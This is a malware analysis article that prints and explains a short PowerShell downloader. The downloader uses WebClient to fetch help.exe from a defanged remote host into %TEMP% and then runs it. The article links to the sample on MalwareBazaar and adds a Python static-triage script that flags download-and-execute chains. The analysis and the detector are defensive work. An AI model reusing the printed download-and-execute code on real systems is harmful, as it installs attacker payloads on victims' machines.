Analysis of a Malicious PowerShell Script

Attackers are always looking for new mechanisms and methods to carry out an attack, and malware developers are always looking for ways to reach the target machine as easily as possible without being picked up by the radar (anti-virus products). In this series of articles we will analyze several malicious scripts, with a focus on PowerShell scripts, which attackers currently rely on heavily.

So what is PowerShell, and why is it so often used by attackers and by the developers of malware such as downloaders or droppers, or embedded in malicious documents such as Office documents? PowerShell is a scripting language and shell produced by Microsoft. A PowerShell script can interact with Windows very closely and very quickly, which has led attackers to rely on it for tasks such as enumeration, reconnaissance, anti-VM checks and much more. This is also why attackers now favor PowerShell over older scripting options such as batch scripts or VBScript: PowerShell can interact with the system more deeply and faster, and has a free hand to intervene in the system in many different ways. In practice, how PowerShell is used depends on the attacker's mindset when creating and developing the malware.

Sample SHA256 : 63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6

Download a Sample : https://bazaar.abuse.ch/sample/63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6/

Malicious Code:

# Create a .NET WebClient object used to fetch the payload
$webClient = New-Object System.Net.WebClient
# Address of the second-stage binary on the remote host (URL defanged)
$url1 = "httpx[://]signin[.]clouddomainservice.com/help.exe"
# Drop location: help.exe inside the current user's %TEMP% directory
$filePath1 = "$env:TEMP\help.exe"
# Download the payload and write it to disk
$webClient.DownloadFile($url1, $filePath1)
# Execute the dropped binary from %TEMP%
Start-Process -FilePath $env:TEMP\help.exe


Code Explanation:

  1. The malware author declares three variables: $webClient, $url1 and $filePath1.
  2. $webClient is a .NET web client object created with New-Object System.Net.WebClient.
  3. $url1 holds the address of the payload, help.exe, hosted at httpx[://]signin[.]clouddomainservice.com/help.exe.
  4. $filePath1 is the drop location for the payload: help.exe inside the user's %TEMP% directory.
  5. $webClient.DownloadFile($url1, $filePath1) downloads help.exe from that URL and writes it to that path.
  6. Start-Process executes the downloaded help.exe from the %TEMP% directory, so the script is a classic download-and-execute downloader.
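The six steps above describe a download-and-execute chain that an analyst can recognise statically, without running the sample. The following Python script is an added example written for this article, not code from the page or from the malware author: it resolves the script's string variables, extracts the download URL and the drop path, rewrites $env: references to %VAR% form so the report does not depend on the analyst's machine, and flags the sample when the path handed to Start-Process is the same path that was just downloaded. It goes beyond the page's sample by also matching Invoke-WebRequest -Uri ... -OutFile ...; the second sample, its host example.invalid and the technique labels are constructed for this example and do not come from the page.

```python
"""Static triage of a PowerShell downloader: resolve string variables, then
link the download destination to the path that is later executed.
Added example for the write-up; regexes cover only the patterns shown here."""
import re
from dataclasses import dataclass, field

# Constructed sample: the script analysed in the write-up, URL left defanged.
SAMPLE_WEBCLIENT = r'''
$webClient = New-Object System.Net.WebClient
$url1 = "httpx[://]signin[.]clouddomainservice.com/help.exe"
$filePath1 = "$env:TEMP\help.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\help.exe
'''

# Constructed variant (hypothetical host, not from the page) using Invoke-WebRequest.
SAMPLE_IWR = r'''
$u = 'https://example.invalid/svc.exe'
Invoke-WebRequest -Uri $u -OutFile "$env:APPDATA\svc.exe"
Start-Process "$env:APPDATA\svc.exe"
'''

QUOTED = r'"[^"]*"' + "|'[^']*'"          # a double- or single-quoted literal
ARG = rf'(?:{QUOTED}|\S+)'                 # one command-line argument
ASSIGN_RE = re.compile(rf'^\s*\$(\w+)\s*=\s*({QUOTED})\s*$', re.M)
DOWNLOADFILE_RE = re.compile(r'\.DownloadFile\(\s*([^,]+?)\s*,\s*([^)]+?)\s*\)', re.I)
IWR_RE = re.compile(rf'(?:Invoke-WebRequest|iwr)\s+(?:-Uri\s+)?({ARG})\s+-OutFile\s+({ARG})', re.I)
START_RE = re.compile(rf'Start-Process\s+(?:-FilePath\s+)?({ARG})', re.I)
ENV_RE = re.compile(r'\$env:(\w+)', re.I)
VAR_RE = re.compile(r'\$(\w+)')
USER_WRITABLE = ("%TEMP%", "%APPDATA%", "%LOCALAPPDATA%")


def expand(token: str, variables: dict) -> str:
    """Resolve one PowerShell argument to a host-independent string.
    $env:X becomes %X%; $name is replaced from the assignments seen so far."""
    token = token.strip()
    if len(token) >= 2 and token[0] == token[-1] and token[0] in "\"'":
        quote, token = token[0], token[1:-1]
        if quote == "'":
            return token  # single quotes: PowerShell performs no expansion
    token = ENV_RE.sub(lambda m: f"%{m.group(1).upper()}%", token)
    return VAR_RE.sub(lambda m: variables.get(m.group(1).lower(), m.group(0)), token)


@dataclass
class Report:
    urls: list = field(default_factory=list)
    drop_paths: list = field(default_factory=list)
    executed: list = field(default_factory=list)
    techniques: list = field(default_factory=list)

    def add(self, technique: str) -> None:
        if technique not in self.techniques:
            self.techniques.append(technique)

    @property
    def malicious(self) -> bool:
        return "download-and-execute" in self.techniques


def triage(script: str) -> Report:
    """Extract IOCs and label the download/execute chain in a script."""
    variables = {}
    for m in ASSIGN_RE.finditer(script):      # pass 1: literal string assignments
        variables[m.group(1).lower()] = expand(m.group(2), variables)
    rep = Report()
    downloads = DOWNLOADFILE_RE.findall(script) + IWR_RE.findall(script)
    for raw_url, raw_path in downloads:       # pass 2: download primitives
        url, path = expand(raw_url, variables), expand(raw_path, variables)
        rep.urls.append(url)
        rep.drop_paths.append(path)
        rep.add("remote-download")
        if path.upper().startswith(USER_WRITABLE):
            rep.add("drop-to-user-writable-dir")
    dropped = {p.lower() for p in rep.drop_paths}
    for m in START_RE.finditer(script):       # pass 3: what gets executed
        path = expand(m.group(1), variables)
        rep.executed.append(path)
        rep.add("process-start")
        if path.lower() in dropped:           # executes what it just downloaded
            rep.add("download-and-execute")
    return rep


if __name__ == "__main__":
    for name, sample in (("webclient", SAMPLE_WEBCLIENT), ("iwr", SAMPLE_IWR)):
        print(name, triage(sample))
```

The report keeps the URL exactly as it appears in the script (here, defanged), so the output can be pasted into an IOC list as-is; refang only inside a sandbox. Single-quoted strings are deliberately not expanded, matching PowerShell's own behaviour, so a script that builds its URL by concatenation or with Invoke-Expression will not be fully resolved by this first-pass tool and still needs manual or dynamic analysis.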
